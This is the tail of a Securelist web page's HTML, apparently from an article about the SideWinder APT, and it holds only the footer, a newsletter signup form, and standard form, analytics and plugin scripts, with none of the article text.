href="https://www.kaspersky.com/end-user-license-agreement?icid=gl_seclistfooter_acq_ona_smm__onl_b2b_securelist_footer_sm-team_______11d7a8212d94123d">License Agreement</a></li> <li><a data-element-id="footer-menu-link" href="javascript: void(0);" onclick="javascript: Cookiebot.renew()">Cookies</a></li> </ul> </div> </div> </div> </section> <div id="modal-newsletter" class="c-modal__wrapper c-modal__wrapper--sm mfp-hide"> <div class="c-modal"> <a href="#" class="c-modal-close js-modal-close"></a> <div class="c-modal__main"> <div class="c-block c-block--spacing-t-small c-block--spacing-b-small"> <div class="o-container-fluid"> <div class="c-block__header"> <h5 class="c-title--small">Subscribe to our weekly e-mails</h5> <p>The hottest research right in your inbox</p> </div> <div class="c-form--float-labels js-float-labels"> <div class='gf_browser_unknown gform_wrapper gform_wrapper_original_id_11 gravity-theme subscribe-mc_wrapper' id='gform_wrapper_1864890607' ><div id='gf_1864890607' class='gform_anchor' tabindex='-1'></div><form method='post' enctype='multipart/form-data' target='gform_ajax_frame_1864890607' id='gform_1864890607' class='subscribe-mc' action='/sidewinder-apt/114089/#gf_1864890607' > <div class="gform-content-wrapper"><div class='gform_body gform-body'><div id='gform_fields_1864890607' class='gform_fields top_label form_sublabel_below description_below'><div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><label class='gfield_label screen-reader-text' for='input_1864890607_1' >Email<span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label><div class='ginput_container ginput_container_email'> <input name='input_1' id='input_1864890607_1' type='text' value='' class='medium' placeholder='Email' aria-required="true" aria-invalid="false" /> </div></div><div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden" ><div class='ginput_container ginput_container_text'><input name='input_3' id='input_1864890607_3' type='hidden' class='gform_hidden' aria-invalid="false" value='' /></div></div><fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible" ><legend class='gfield_label screen-reader-text gfield_label_before_complex' ><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend><div class='ginput_container ginput_container_checkbox'><div class='gfield_checkbox' id='input_1864890607_2'><div class='gchoice gchoice_11_2_1'> <input class='gfield-choice-input' name='input_2.1' type='checkbox' value='I agree' id='choice_1864890607_11_2_1' /> <label for='choice_1864890607_11_2_1' id='label_1864890607_11_2_1'>I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label> </div></div></div></fieldset></div></div> <div class='gform_footer top_label'> <button type="submit" class="gform_button button" id='gform_submit_button_1864890607' value="Sign up"> <svg class="o-icon o-svg-icon o-svg-large"><use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use></svg> <span>Subscribe</span> </button> <input type='hidden' name='gform_ajax' value='form_id=11&title=&description=&tabindex=0' /> <input type='hidden' class='gform_hidden' name='is_submit_11' value='1' /> <input type='hidden' class='gform_hidden' name='gform_submit' value='11' /> <input type='hidden' class='gform_hidden' name='gform_unique_id' value='' /> <input type='hidden' class='gform_hidden' name='state_11' value='WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=' /> <input type='hidden' class='gform_hidden' name='gform_target_page_number_11' id='gform_target_page_number_1864890607_11' value='0' /> <input type='hidden' class='gform_hidden' name='gform_source_page_number_11' id='gform_source_page_number_1864890607_11' value='1' /> <input type='hidden' name='gform_random_id' value='1864890607' /><input type='hidden' name='gform_field_values' value='securelist_2020_form_location=sidebar' /> </div> </div><p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_4" name="ak_js" value="157"/><script>document.getElementById( "ak_js_4" ).setAttribute( "value", ( new Date() ).getTime() );</script></p></form> </div> <iframe style='display:none;width:0px;height:0px;' src='about:blank' name='gform_ajax_frame_1864890607' id='gform_ajax_frame_1864890607' title='This iframe contains the logic required to handle Ajax powered Gravity Forms.'></iframe> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() {gformInitSpinner( 1864890607, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery('#gform_ajax_frame_1864890607').on('load',function(){var contents = jQuery(this).contents().find('*').html();var is_postback = contents.indexOf('GF_AJAX_POSTBACK') >= 0;if(!is_postback){return;}var form_content = jQuery(this).contents().find('#gform_wrapper_1864890607');var is_confirmation = jQuery(this).contents().find('#gform_confirmation_wrapper_1864890607').length > 0;var is_redirect = contents.indexOf('gformRedirect(){') >= 0;var is_form = form_content.length > 0 && ! is_redirect && ! is_confirmation;var mt = parseInt(jQuery('html').css('margin-top'), 10) + parseInt(jQuery('body').css('margin-top'), 10) + 100;if(is_form){jQuery('#gform_wrapper_1864890607').html(form_content.html());if(form_content.hasClass('gform_validation_error')){jQuery('#gform_wrapper_1864890607').addClass('gform_validation_error');} else {jQuery('#gform_wrapper_1864890607').removeClass('gform_validation_error');}setTimeout( function() { /* delay the scroll by 50 milliseconds to fix a bug in chrome */ jQuery(document).scrollTop(jQuery('#gform_wrapper_1864890607').offset().top - mt); }, 50 );if(window['gformInitDatepicker']) {gformInitDatepicker();}if(window['gformInitPriceFields']) {gformInitPriceFields();}var current_page = jQuery('#gform_source_page_number_1864890607_11').val();gformInitSpinner( 1864890607, 'https://securelist.com/wp-content/themes/securelist2020/assets/images/content/ajax-spinner-red.svg' );jQuery(document).trigger('gform_page_loaded', [1864890607, current_page]);window['gf_submitting_1864890607'] = false;}else if(!is_redirect){var confirmation_content = jQuery(this).contents().find('.GF_AJAX_POSTBACK').html();if(!confirmation_content){confirmation_content = contents;}setTimeout(function(){jQuery('#gform_wrapper_1864890607').replaceWith(confirmation_content);jQuery(document).scrollTop(jQuery('#gf_1864890607').offset().top - mt);jQuery(document).trigger('gform_confirmation_loaded', [1864890607]);window['gf_submitting_1864890607'] = false;wp.a11y.speak(jQuery('#gform_confirmation_message_1864890607').text());}, 50);}else{jQuery('#gform_1864890607').append(contents);if(window['gformRedirect']) {gformRedirect();}}jQuery(document).trigger('gform_post_render', [1864890607, current_page]);} );} ); /* ]]> */ </script> </div> </div> </div> </div><!-- /.c-modal__main --> </div><!-- /.c-modal --> </div><!-- /.c-modal__wrapper --> <script type="text/javascript"> if ( typeof _recaptcha_wordpress_savedcomment != 'undefined') { document.getElementById('comment').value = _recaptcha_wordpress_savedcomment; } </script><script type="text/javascript" src="https://kasperskycontenthub.com/securelist/wp-content/plugins/kaspersky-embeds/js/scripts.js?ver=1.0" id="kspr_embeds-js"></script> <script type="text/javascript" src="https://www.google.com/recaptcha/api.js?render=explicit&ver=202124050927" id="kaspersky-dynamic-gravity-forms-google-recaptcha-js"></script> <script type="text/javascript" id="kaspersky-omniture-js-extra"> /* <![CDATA[ */ var kaspersky = {"pageName":"Kaspersky Securelist","pageType":"blog","platformName":"Micro Site","businessType":"b2c","siteLocale":"en-GLOBAL"}; /* ]]> */ </script> <script type="text/javascript" src="//media.kaspersky.com/tracking/omniture/s_code_single_suite.js?ver=6.5.5" id="kaspersky-omniture-js"></script> <script type="text/javascript" id="crayon_js-js-extra"> /* <![CDATA[ */ var CrayonSyntaxSettings = {"version":"_2.7.2_beta","is_admin":"0","ajaxurl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","prefix":"crayon-","setting":"crayon-setting","selected":"crayon-setting-selected","changed":"crayon-setting-changed","special":"crayon-setting-special","orig_value":"data-orig-value","debug":""}; var CrayonSyntaxStrings = {"copy":"Press %s to Copy, %s to Paste","minimize":"Click To Expand Code"}; /* ]]> */ </script> <script type="text/javascript" id="kaspersky-dynamic-gravity-forms-main-js-extra"> /* <![CDATA[ */ var kasperskyDynamicaReCaptchaData = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="wp-autosearch-script-js-extra"> /* <![CDATA[ */ var wp_autosearch_config = {"autocomplete_taxonomies":{"0":"category"},"split_results_by_type":"true","search_title":"true","search_content":"false","search_terms":"false","search_exactonly":"true","order_by":"title","order":"DESC","search_comments":"false","search_tags":"false","no_of_results":"5","description_limit":"100","title_limit":"50","excluded_ids":{},"excluded_cats":{"0":0},"full_search_url":"https:\/\/kasperskycontenthub.com\/securelist\/?s=%q%","min_chars":"3","ajax_delay":"200","cache_length":"200","autocomplete_sortorder":"posts","thumb_image_display":"false","thumb_image_width":"50","thumb_image_height":"50","get_first_image":"true","force_resize_first_image":"true","thumb_image_crop":"true","default_image":"https:\/\/kasperskycontenthub.com\/securelist\/wp-content\/plugins\/wp-autosearch\/assert\/image\/default.png","search_image":"","display_more_bar":"false","display_result_title":"false","enable_token":"true","custom_css":"","custom_js":"","try_full_search_text":"Search more...","no_results_try_full_search_text":"No Results!","show_author":"false","show_date":"false","description_result":"false","color":{"results_even_bar":"E8E8E8","results_odd_bar":"FFFFFF","results_even_text":"000000","results_odd_text":"000000","results_hover_bar":"5CCCB2","results_hover_text":"FFFFFF","seperator_bar":"2D8DA0","seperator_hover_bar":"6A81A0","seperator_text":"FFFFFF","seperator_hover_text":"FFFFFF","more_bar":"5286A0","more_hover_bar":"4682A0","more_text":"FFFFFF","more_hover_text":"FFFFFF","box_border":"57C297","box_background":"FFFFFF","box_text":"000000"},"title":{"page":"Pages","post":"Posts","webinars":"Webinars"},"post_types":{"0":"page","1":"post","2":"webinars"},"nonce":"92725ed6a8","ajax_url":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type="text/javascript" id="securelist-script-js-extra"> /* <![CDATA[ */ var securelist2020Data = {"ajaxUrl":"https:\/\/securelist.com\/wp-admin\/admin-ajax.php","loading":"Loading...","marketoBaseURL":"","marketoVirtualForm":"27241","munchkinID":"802-IJN-240","reCaptcha_key":"6Lf2eUQUAAAAAC-GQSZ6R2pjePmmD6oA6F_3AV7j"}; /* ]]> */ </script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-content/plugins/crayon-syntax-highlighter/js/min/crayon.min.js,wp-content/plugins/kaspersky-gravity-forms-dynamic-recaptcha/assets/js/main.js,wp-content/plugins/kaspersky-lazy-load/assets/js/main.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/migrate.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/autocomplete.js,wp-content/plugins/kaspersky-wp-autosearch/assert/js/ajax-script.js,wp-content/plugins/wds-no-login-autocomplete/js/script.js,wp-content/themes/securelist2020/assets/js/main.js,wp-includes/js/comment-reply.min.js,wp-content/plugins/akismet/_inc/akismet-frontend.js'></script> <script type='text/javascript' src='//assets.kasperskycontenthub.com/wp-content/plugins/bwp-minify/min/?f=wp-includes/js/dist/vendor/wp-polyfill-inert.min.js,wp-includes/js/dist/vendor/regenerator-runtime.min.js,wp-includes/js/dist/vendor/wp-polyfill.min.js,wp-includes/js/dist/dom-ready.min.js,wp-includes/js/dist/hooks.min.js,wp-includes/js/dist/i18n.min.js,wp-includes/js/dist/a11y.min.js'></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/jquery.json.min.js?ver=2.5.16.3" id="gform_json-js"></script> <script type="text/javascript" id="gform_gravityforms-js-extra"> /* <![CDATA[ */ var gform_i18n = {"datepicker":{"days":{"monday":"Mon","tuesday":"Tue","wednesday":"Wed","thursday":"Thu","friday":"Fri","saturday":"Sat","sunday":"Sun"},"months":{"january":"January","february":"February","march":"March","april":"April","may":"May","june":"June","july":"July","august":"August","september":"September","october":"October","november":"November","december":"December"},"firstDay":1,"iconText":"Select date"}}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; var gf_global = {"gf_currency_config":{"name":"U.S. Dollar","symbol_left":"$","symbol_right":"","symbol_padding":"","thousand_separator":",","decimal_separator":".","decimals":2,"code":"USD"},"base_url":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms","number_formats":[],"spinnerUrl":"https:\/\/securelist.com\/wp-content\/plugins\/gravityforms\/images\/spinner.svg","strings":{"newRowAdded":"New row added.","rowRemoved":"Row removed","formSaved":"The form has been saved. The content contains the link to return and complete the form."}}; var gf_legacy_multi = {"11":""}; /* ]]> */ </script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/gravityforms.min.js?ver=2.5.16.3" id="gform_gravityforms-js"></script> <script type="text/javascript" defer='defer' src="https://securelist.com/wp-content/plugins/gravityforms/js/placeholders.jquery.min.js?ver=2.5.16.3" id="gform_placeholder-js"></script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).on('gform_post_render', function(event, formId, currentPage){if(formId == 11) {if(typeof Placeholders != 'undefined'){ Placeholders.enable(); }} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ) } ); /* ]]> */ </script> <script type="text/javascript"> /* <![CDATA[ */ gform.initializeOnLoaded( function() { jQuery(document).trigger('gform_post_render', [11, 1]) } ); /* ]]> */ </script> </body> </html>